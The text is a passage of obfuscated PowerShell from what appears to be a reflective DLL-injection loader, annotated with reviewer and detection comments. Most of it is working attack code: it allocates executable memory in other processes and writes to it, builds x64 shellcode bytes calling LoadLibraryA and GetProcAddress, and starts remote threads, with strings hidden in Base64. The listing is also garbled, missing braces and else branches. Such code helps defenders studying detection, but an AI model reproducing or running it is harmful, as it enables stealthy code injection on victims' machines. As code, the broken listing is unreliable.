if ((${01010101101001001} -ge (New-Object $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBlAHIAcwBpAG8AbgA='))) 6,0)) -and (${01010101101001001} -lt (New-Object $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBlAHIAcwBpAG8AbgA='))) 6,2)))
${01111010001100010}= $Win32Functions.NtCreateThreadEx.Invoke([Ref]${01110010011011110}, 0x1FFFFF, [IntPtr]::Zero, ${_10011010100110011}, ${_01110111110010110}, ${_00011010100011100}, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero)
${10100011100000000} = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
if (${01110010011011110} -eq [IntPtr]::Zero)
Throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQByAHIAbwByACAAaQBuACAATgB0AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkAEUAeAAuACAAUgBlAHQAdQByAG4AIAB2AGEAbAB1AGUAOgAgACQAewAwADEAMQAxADEAMAAxADAAMAAwADEAMQAwADAAMAAxADAAfQAuACAATABhAHMAdABFAHIAcgBvAHIAOgAgACQAewAxADAAMQAwADAAMAAxADEAMQAwADAAMAAwADAAMAAwADAAfQA=')))
${01110010011011110} = $Win32Functions.CreateRemoteThread.Invoke(${_10011010100110011}, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, ${_01110111110010110}, ${_00011010100011100}, 0, [IntPtr]::Zero)
if (${01110010011011110} -eq [IntPtr]::Zero)
Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQByAHIAbwByACAAYwByAGUAYQB0AGkAbgBnACAAcgBlAG0AbwB0AGUAIAB0AGgAcgBlAGEAZAAsACAAdABoAHIAZQBhAGQAIABoAGEAbgBkAGwAZQAgAGkAcwAgAG4AdQBsAGwA'))) -ErrorAction Stop
return ${01110010011011110}
# Parses the NT headers of a PE image that is already in memory and reports
# whether the image is 64-bit.
#
# Parameters:
#   position 0 [IntPtr] - address of the start of the PE image.
#   position 1 [Object] - $Win32Types, the marshalling struct definitions.
# Returns: an object with the note properties NtHeadersPtr, IMAGE_NT_HEADERS
#          and PE64Bit.
# Throws:  the Base64 literal decodes (UTF-16LE) to
#          "Invalid IMAGE_NT_HEADER signature."
#
# Flow: read IMAGE_DOS_HEADER at the image address, add its e_lfanew field to
# get the NT headers address, read that as IMAGE_NT_HEADERS64, check the
# Signature field against 0x00004550, then compare OptionalHeader.Magic with
# the decoded string "IMAGE_NT_OPTIONAL_HDR64_MAGIC" (presumably the name of
# an enum member defined in $Win32Types - verify against that definition).
# The headers are re-read as IMAGE_NT_HEADERS32 for the non-64-bit case.
#
# NOTE(review): the visible lines do not validate the DOS header magic and do
# not bound e_lfanew against the size of the buffer before dereferencing it,
# so the parser trusts the image it is given. Braces, the `else` keyword and
# the closing ")" of Param are missing from this listing, which is why both
# the 64-bit and 32-bit Add-Member pairs appear one after the other.
Function _01110101010101000
Param(
[Parameter(Position = 0, Mandatory = $true)]
[IntPtr]
${_10111111000001111},
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
$Win32Types
${00011111111110000} = New-Object System.Object
${10011101010100010} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${_10111111000001111}, [Type]$Win32Types.IMAGE_DOS_HEADER)
# NT headers address = image address + e_lfanew (unsigned-safe add helper).
[IntPtr]${10111100101111011} = [IntPtr](_01101001110001101 ([Int64]${_10111111000001111}) ([Int64][UInt64]${10011101010100010}.e_lfanew))
${00011111111110000} | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ${10111100101111011}
${10001010001011101} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10111100101111011}, [Type]$Win32Types.IMAGE_NT_HEADERS64)
# 0x00004550 is the bytes 'P','E',0,0 read as a little-endian 32-bit value.
if (${10001010001011101}.Signature -ne 0x00004550)
throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAYQBsAGkAZAAgAEkATQBBAEcARQBfAE4AVABfAEgARQBBAEQARQBSACAAcwBpAGcAbgBhAHQAdQByAGUALgA=')))
if (${10001010001011101}.OptionalHeader.Magic -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ATgBUAF8ATwBQAFQASQBPAE4AQQBMAF8ASABEAFIANgA0AF8ATQBBAEcASQBDAA=='))))
${00011111111110000} | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ${10001010001011101}
${00011111111110000} | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true
${00010011100101101} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10111100101111011}, [Type]$Win32Types.IMAGE_NT_HEADERS32)
${00011111111110000} | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ${00010011100101101}
${00011111111110000} | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false
return ${00011111111110000}
# Extracts a few header fields from a PE file held in a managed byte array.
#
# Parameters:
#   position 0 [Byte[]] - the raw PE file.
#   position 1 [Object] - $Win32Types, the marshalling struct definitions.
# Returns: an object whose property names are Base64-encoded UTF-16LE literals
#          decoding to PE64Bit, OriginalImageBase, SizeOfImage, SizeOfHeaders
#          and DllCharacteristics. All values except PE64Bit come from
#          IMAGE_NT_HEADERS.OptionalHeader.
#
# Flow: copy the bytes into an AllocHGlobal buffer, parse the headers with
# _01110101010101000, copy the fields, free the buffer.
#
# NOTE(review): the buffer is freed only on the straight-line path; if the
# header parser throws (for example on a bad signature) no FreeHGlobal is
# reached in the visible lines. The braces and the closing ")" of Param are
# missing from this listing.
Function _01110011101110110
Param(
[Parameter( Position = 0, Mandatory = $true )]
[Byte[]]
${_00000000110100000},
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
$Win32Types
${_00110100101000100} = New-Object System.Object
# Temporary unmanaged copy of the file so the header structs can be marshalled.
[IntPtr]${00101011111001001} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${_00000000110100000}.Length)
[System.Runtime.InteropServices.Marshal]::Copy(${_00000000110100000}, 0, ${00101011111001001}, ${_00000000110100000}.Length) | Out-Null
${00011111111110000} = _01110101010101000 -_10111111000001111 ${00101011111001001} -Win32Types $Win32Types
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFADYANABCAGkAdAA='))) -Value (${00011111111110000}.PE64Bit)
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TwByAGkAZwBpAG4AYQBsAEkAbQBhAGcAZQBCAGEAcwBlAA=='))) -Value (${00011111111110000}.IMAGE_NT_HEADERS.OptionalHeader.ImageBase)
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASQBtAGEAZwBlAA=='))) -Value (${00011111111110000}.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASABlAGEAZABlAHIAcwA='))) -Value (${00011111111110000}.IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders)
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABsAGwAQwBoAGEAcgBhAGMAdABlAHIAaQBzAHQAaQBjAHMA'))) -Value (${00011111111110000}.IMAGE_NT_HEADERS.OptionalHeader.DllCharacteristics)
[System.Runtime.InteropServices.Marshal]::FreeHGlobal(${00101011111001001})
return ${_00110100101000100}
# Builds a descriptor object for a PE image that is already mapped at a given
# address.
#
# Parameters:
#   position 0 [IntPtr] - address of the image (stored as PEHandle).
#   position 1 [Object] - $Win32Types, the marshalling struct definitions.
#   position 2 [Object] - $Win32Constants, the numeric constants.
# Returns: an object with PEHandle, IMAGE_NT_HEADERS, NtHeadersPtr, PE64Bit,
#          SizeOfImage (name stored as a Base64 literal), SectionHeaderPtr and
#          FileType.
# Throws (Base64 literals decoded as UTF-16LE):
#   "PEHandle is null or IntPtr.Zero"
#   "PE file is not an EXE or DLL"
#
# SectionHeaderPtr is NtHeadersPtr plus the marshalled size of the 64-bit or
# 32-bit NT headers struct. FileType is set from FileHeader.Characteristics:
# the decoded values are "DLL" when IMAGE_FILE_DLL is set and "EXE" when
# IMAGE_FILE_EXECUTABLE_IMAGE is set; the DLL test comes first.
#
# NOTE(review): braces, the `else` keywords and the closing ")" of Param are
# missing from this listing, so the 64-bit and 32-bit SectionHeaderPtr pairs
# and the final Throw appear as straight-line statements.
Function _00011000111100111
Param(
[Parameter( Position = 0, Mandatory = $true)]
[IntPtr]
${_10111111000001111},
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
$Win32Types,
[Parameter(Position = 2, Mandatory = $true)]
[System.Object]
$Win32Constants
if (${_10111111000001111} -eq $null -or ${_10111111000001111} -eq [IntPtr]::Zero)
throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFAEgAYQBuAGQAbABlACAAaQBzACAAbgB1AGwAbAAgAG8AcgAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwA=')))
${_00110100101000100} = New-Object System.Object
${00011111111110000} = _01110101010101000 -_10111111000001111 ${_10111111000001111} -Win32Types $Win32Types
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name PEHandle -Value ${_10111111000001111}
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value (${00011111111110000}.IMAGE_NT_HEADERS)
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value (${00011111111110000}.NtHeadersPtr)
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name PE64Bit -Value (${00011111111110000}.PE64Bit)
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASQBtAGEAZwBlAA=='))) -Value (${00011111111110000}.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)
# The section headers start immediately after the NT headers struct.
if (${_00110100101000100}.PE64Bit -eq $true)
[IntPtr]${10010110010010000} = [IntPtr](_01101001110001101 ([Int64]${_00110100101000100}.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64)))
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value ${10010110010010000}
[IntPtr]${10010110010010000} = [IntPtr](_01101001110001101 ([Int64]${_00110100101000100}.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32)))
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value ${10010110010010000}
# Classify the image from the Characteristics flags of the file header.
if ((${00011111111110000}.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -eq $Win32Constants.IMAGE_FILE_DLL)
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name FileType -Value $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABMAEwA')))
elseif ((${00011111111110000}.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) -eq $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE)
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name FileType -Value $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBYAEUA')))
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFACAAZgBpAGwAZQAgAGkAcwAgAG4AbwB0ACAAYQBuACAARQBYAEUAIABvAHIAIABEAEwATAA=')))
return ${_00110100101000100}
# Makes another process load a DLL by name and returns the resulting module
# handle as an IntPtr.
#
# Parameters:
#   ${_10010001100101011} - IntPtr handle of the target process.
#   ${_01010010101010011} - IntPtr to an ANSI string in this process (the DLL
#                           path/name, per the decoded error text below).
# Reads $Win32Functions, $Win32Constants and ${_00110100101000100}.PE64Bit from
# an enclosing scope; none of them is a parameter here.
#
# Analyst note (detection): the visible API sequence is VirtualAllocEx ->
# WriteProcessMemory -> GetModuleHandle("kernel32.dll") ->
# GetProcAddress("LoadLibraryA") -> a PAGE_EXECUTE_READWRITE allocation in the
# target -> a thread started through helper _00100111111000100 ->
# WaitForSingleObject -> ReadProcessMemory / GetExitCodeThread -> VirtualFreeEx.
# Cross-process RWX allocation followed by a write and a new thread is the
# behaviour that EDR and PowerShell script-block logging are expected to surface.
#
# NOTE(review): brace lines and `else` keywords are missing from this listing;
# the 64-bit / non-64-bit split described below is inferred.
# NOTE(review): the two AllocHGlobal buffers (L778, L804 of the page) are not
# freed anywhere in the lines shown.
Function _01001010011111000
Param(
[Parameter(Position=0, Mandatory=$true)]
[IntPtr]
${_10010001100101011},
[Parameter(Position=1, Mandatory=$true)]
[IntPtr]
${_01010010101010011}
${01001001001010110} = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
${00111101100010100} = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi(${_01010010101010011})
# String length + 1, presumably to include the terminating NUL.
${01101011111000100} = [UIntPtr][UInt64]([UInt64]${00111101100010100}.Length + 1)
# Read/write buffer in the target process that will hold the DLL name.
${10001010000101011} = $Win32Functions.VirtualAllocEx.Invoke(${_10010001100101011}, [IntPtr]::Zero, ${01101011111000100}, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
if (${10001010000101011} -eq [IntPtr]::Zero)
# decodes to: "Unable to allocate memory in the remote process"
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABhAGwAbABvAGMAYQB0AGUAIABtAGUAbQBvAHIAeQAgAGkAbgAgAHQAaABlACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzAA==')))
[UIntPtr]${01101111010110100} = [UIntPtr]::Zero
${01100111110111001} = $Win32Functions.WriteProcessMemory.Invoke(${_10010001100101011}, ${10001010000101011}, ${_01010010101010011}, ${01101011111000100}, [Ref]${01101111010110100})
if (${01100111110111001} -eq $false)
# decodes to: "Unable to write DLL path to remote process memory"
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIAB3AHIAaQB0AGUAIABEAEwATAAgAHAAYQB0AGgAIAB0AG8AIAByAGUAbQBvAHQAZQAgAHAAcgBvAGMAZQBzAHMAIABtAGUAbQBvAHIAeQA=')))
if (${01101011111000100} -ne ${01101111010110100})
# decodes to: "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process"
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABpAGQAbgAnAHQAIAB3AHIAaQB0AGUAIAB0AGgAZQAgAGUAeABwAGUAYwB0AGUAZAAgAGEAbQBvAHUAbgB0ACAAbwBmACAAYgB5AHQAZQBzACAAdwBoAGUAbgAgAHcAcgBpAHQAaQBuAGcAIABhACAARABMAEwAIABwAGEAdABoACAAdABvACAAbABvAGEAZAAgAHQAbwAgAHQAaABlACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzAA==')))
# decodes to: "kernel32.dll" and "LoadLibraryA"
${01100100100000111} = $Win32Functions.GetModuleHandle.Invoke($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('awBlAHIAbgBlAGwAMwAyAC4AZABsAGwA'))))
${10111111101110010} = $Win32Functions.GetProcAddress.Invoke(${01100100100000111}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABvAGEAZABMAGkAYgByAGEAcgB5AEEA'))))
[IntPtr]${00100010011111001} = [IntPtr]::Zero
# 64-bit path: a thread exit code cannot carry a pointer-sized module handle, so
# the result is written to a separate remote buffer and read back afterwards
# (rationale inferred from the two paths; the code itself does not state it).
if (${_00110100101000100}.PE64Bit -eq $true)
${10011010100110110} = $Win32Functions.VirtualAllocEx.Invoke(${_10010001100101011}, [IntPtr]::Zero, ${01101011111000100}, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
if (${10011010100110110} -eq [IntPtr]::Zero)
# decodes to: "Unable to allocate memory in the remote process for the return value of LoadLibraryA"
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABhAGwAbABvAGMAYQB0AGUAIABtAGUAbQBvAHIAeQAgAGkAbgAgAHQAaABlACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzACAAZgBvAHIAIAB0AGgAZQAgAHIAZQB0AHUAcgBuACAAdgBhAGwAdQBlACAAbwBmACAATABvAGEAZABMAGkAYgByAGEAcgB5AEEA')))
# Four fixed byte fragments (the script's own error text calls the result
# "shellcode") with three pointer-sized slots between them.
${01111010111011111} = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)
${00111110111000001} = @(0x48, 0xba)
${01101100101010110} = @(0xff, 0xd2, 0x48, 0xba)
${01010000101110011} = @(0x48, 0x89, 0x02, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
${10100011000000001} = ${01111010111011111}.Length + ${00111110111000001}.Length + ${01101100101010110}.Length + ${01010000101110011}.Length + (${01001001001010110} * 3)
${01101100010011100} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${10100011000000001})
# Keep the start of the local staging buffer; the other variable is advanced.
${10101000010001101} = ${01101100010011100}
# _01011110000000101 presumably copies a byte array to the given pointer and
# _01101001110001101 presumably advances a pointer; both are defined elsewhere.
# Slot 1: address of the remote DLL-name buffer.
_01011110000000101 -_00101110110110110 ${01111010111011111} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01111010111011111}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${10001010000101011}, ${01101100010011100}, $false)
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01001001001010110})
# Slot 2: address returned by GetProcAddress for "LoadLibraryA".
_01011110000000101 -_00101110110110110 ${00111110111000001} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${00111110111000001}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${10111111101110010}, ${01101100010011100}, $false)
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01001001001010110})
# Slot 3: address of the remote return-value buffer.
_01011110000000101 -_00101110110110110 ${01101100101010110} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01101100101010110}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${10011010100110110}, ${01101100010011100}, $false)
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01001001001010110})
_01011110000000101 -_00101110110110110 ${01010000101110011} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01010000101110011}.Length)
# Executable + writable region in the target process: the highest-signal
# indicator in this function.
${00110110110011110} = $Win32Functions.VirtualAllocEx.Invoke(${_10010001100101011}, [IntPtr]::Zero, [UIntPtr][UInt64]${10100011000000001}, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
if (${00110110110011110} -eq [IntPtr]::Zero)
# decodes to: "Unable to allocate memory in the remote process for shellcode"
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABhAGwAbABvAGMAYQB0AGUAIABtAGUAbQBvAHIAeQAgAGkAbgAgAHQAaABlACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzACAAZgBvAHIAIABzAGgAZQBsAGwAYwBvAGQAZQA=')))
${01100111110111001} = $Win32Functions.WriteProcessMemory.Invoke(${_10010001100101011}, ${00110110110011110}, ${10101000010001101}, [UIntPtr][UInt64]${10100011000000001}, [Ref]${01101111010110100})
if ((${01100111110111001} -eq $false) -or ([UInt64]${01101111010110100} -ne [UInt64]${10100011000000001}))
# decodes to: "Unable to write shellcode to remote process memory."
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIAB3AHIAaQB0AGUAIABzAGgAZQBsAGwAYwBvAGQAZQAgAHQAbwAgAHIAZQBtAG8AdABlACAAcAByAG8AYwBlAHMAcwAgAG0AZQBtAG8AcgB5AC4A')))
# Thread start is delegated to _00100111111000100 (defined outside this view).
${01011010001111011} = _00100111111000100 -_10011010100110011 ${_10010001100101011} -_01110111110010110 ${00110110110011110} -Win32Functions $Win32Functions
# Wait with a timeout value of 20000; any non-zero wait result is an error.
${01111011110110011} = $Win32Functions.WaitForSingleObject.Invoke(${01011010001111011}, 20000)
if (${01111011110110011} -ne 0)
# decodes to: "Call to CreateRemoteThread to call GetProcAddress failed."
# NOTE(review): the text names GetProcAddress although this function resolves
# LoadLibraryA; the message looks copied from the sibling function.
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAEMAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkACAAdABvACAAYwBhAGwAbAAgAEcAZQB0AFAAcgBvAGMAQQBkAGQAcgBlAHMAcwAgAGYAYQBpAGwAZQBkAC4A')))
[IntPtr]${10000111100011011} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${01001001001010110})
${01111011110110011} = $Win32Functions.ReadProcessMemory.Invoke(${_10010001100101011}, ${10011010100110110}, ${10000111100011011}, [UIntPtr][UInt64]${01001001001010110}, [Ref]${01101111010110100})
if (${01111011110110011} -eq $false)
# decodes to: "Call to ReadProcessMemory failed"
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAFIAZQBhAGQAUAByAG8AYwBlAHMAcwBNAGUAbQBvAHIAeQAgAGYAYQBpAGwAZQBkAA==')))
[IntPtr]${00100010011111001} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10000111100011011}, [Type][IntPtr])
# Release the remote return buffer and the remote executable region.
$Win32Functions.VirtualFreeEx.Invoke(${_10010001100101011}, ${10011010100110110}, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
$Win32Functions.VirtualFreeEx.Invoke(${_10010001100101011}, ${00110110110011110}, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
# Presumably the non-64-bit branch: the thread starts at the LoadLibraryA
# address with the remote name buffer as its argument, and the thread exit
# code is taken as the module handle.
[IntPtr]${01011010001111011} = _00100111111000100 -_10011010100110011 ${_10010001100101011} -_01110111110010110 ${10111111101110010} -_00011010100011100 ${10001010000101011} -Win32Functions $Win32Functions
${01111011110110011} = $Win32Functions.WaitForSingleObject.Invoke(${01011010001111011}, 20000)
if (${01111011110110011} -ne 0)
# decodes to: "Call to CreateRemoteThread to call GetProcAddress failed."
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAEMAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkACAAdABvACAAYwBhAGwAbAAgAEcAZQB0AFAAcgBvAGMAQQBkAGQAcgBlAHMAcwAgAGYAYQBpAGwAZQBkAC4A')))
[Int32]${01011101000101011} = 0
${01111011110110011} = $Win32Functions.GetExitCodeThread.Invoke(${01011010001111011}, [Ref]${01011101000101011})
# A zero exit code is treated as failure as well as a failed API call.
if ((${01111011110110011} -eq 0) -or (${01011101000101011} -eq 0))
# decodes to: "Call to GetExitCodeThread failed"
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAEcAZQB0AEUAeABpAHQAQwBvAGQAZQBUAGgAcgBlAGEAZAAgAGYAYQBpAGwAZQBkAA==')))
[IntPtr]${00100010011111001} = [IntPtr]${01011101000101011}
# Release the remote DLL-name buffer before returning the handle.
$Win32Functions.VirtualFreeEx.Invoke(${_10010001100101011}, ${10001010000101011}, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
return ${00100010011111001}
# Resolves an exported function address inside another process by running
# GetProcAddress there, and returns the address as an IntPtr.
#
# Parameters:
#   ${_10010001100101011} - IntPtr handle of the target process.
#   ${_01110010110011000} - IntPtr module handle in the target process.
#   ${_10100110000101100} - IntPtr: pointer to an ANSI function name in this
#                           process, or the value itself when the flag is set.
#   ${_00110010001110110} - Bool; when true the previous argument is passed
#                           through unchanged (the caller in this file sets it
#                           for ordinal imports).
# Reads $Win32Functions, $Win32Constants and ${_00110100101000100}.PE64Bit from
# an enclosing scope.
#
# Analyst note (detection): same cross-process pattern as the DLL-load helper:
# VirtualAllocEx, WriteProcessMemory, a PAGE_EXECUTE_READWRITE allocation, a
# thread started via _00100111111000100, then ReadProcessMemory and VirtualFreeEx.
#
# NOTE(review): brace lines and one `else` are missing from this listing; the
# second group of five byte arrays is presumably the non-64-bit branch.
# NOTE(review): the AllocHGlobal buffers created below are not freed in the
# lines shown.
Function _01011101100111011
Param(
[Parameter(Position=0, Mandatory=$true)]
[IntPtr]
${_10010001100101011},
[Parameter(Position=1, Mandatory=$true)]
[IntPtr]
${_01110010110011000},
[Parameter(Position=2, Mandatory=$true)]
[IntPtr]
${_10100110000101100},
[Parameter(Position=3, Mandatory=$true)]
[Bool]
${_00110010001110110}
${01001001001010110} = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
[IntPtr]${10000110110110111} = [IntPtr]::Zero
# By name: copy the ANSI name (length + 1) into a read/write buffer in the target.
if (-not ${_00110010001110110})
{
${_10100010000010100} = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi(${_10100110000101100})
${10000010111110000} = [UIntPtr][UInt64]([UInt64]${_10100010000010100}.Length + 1)
${10000110110110111} = $Win32Functions.VirtualAllocEx.Invoke(${_10010001100101011}, [IntPtr]::Zero, ${10000010111110000}, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
if (${10000110110110111} -eq [IntPtr]::Zero)
# decodes to: "Unable to allocate memory in the remote process"
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABhAGwAbABvAGMAYQB0AGUAIABtAGUAbQBvAHIAeQAgAGkAbgAgAHQAaABlACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzAA==')))
[UIntPtr]${01101111010110100} = [UIntPtr]::Zero
${01100111110111001} = $Win32Functions.WriteProcessMemory.Invoke(${_10010001100101011}, ${10000110110110111}, ${_10100110000101100}, ${10000010111110000}, [Ref]${01101111010110100})
if (${01100111110111001} -eq $false)
# decodes to: "Unable to write DLL path to remote process memory"
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIAB3AHIAaQB0AGUAIABEAEwATAAgAHAAYQB0AGgAIAB0AG8AIAByAGUAbQBvAHQAZQAgAHAAcgBvAGMAZQBzAHMAIABtAGUAbQBvAHIAeQA=')))
if (${10000010111110000} -ne ${01101111010110100})
# decodes to: "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process"
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABpAGQAbgAnAHQAIAB3AHIAaQB0AGUAIAB0AGgAZQAgAGUAeABwAGUAYwB0AGUAZAAgAGEAbQBvAHUAbgB0ACAAbwBmACAAYgB5AHQAZQBzACAAdwBoAGUAbgAgAHcAcgBpAHQAaQBuAGcAIABhACAARABMAEwAIABwAGEAdABoACAAdABvACAAbABvAGEAZAAgAHQAbwAgAHQAaABlACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzAA==')))
}
else
{
# Flag set: the value is handed to GetProcAddress as-is, nothing is copied.
${10000110110110111} = ${_10100110000101100}
}
# decodes to: "kernel32.dll" and "GetProcAddress"
${01100100100000111} = $Win32Functions.GetModuleHandle.Invoke($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('awBlAHIAbgBlAGwAMwAyAC4AZABsAGwA'))))
${00101100001110101} = $Win32Functions.GetProcAddress.Invoke(${01100100100000111}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQAUAByAG8AYwBBAGQAZAByAGUAcwBzAA=='))))
# Pointer-sized remote buffer that receives the resolved address.
# NOTE(review): the size is cast with [UInt64][UInt64] here, while every other
# VirtualAllocEx call in this file casts with [UIntPtr][UInt64].
${00100010101000101} = $Win32Functions.VirtualAllocEx.Invoke(${_10010001100101011}, [IntPtr]::Zero, [UInt64][UInt64]${01001001001010110}, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
if (${00100010101000101} -eq [IntPtr]::Zero)
# decodes to: "Unable to allocate memory in the remote process for the return value of GetProcAddress"
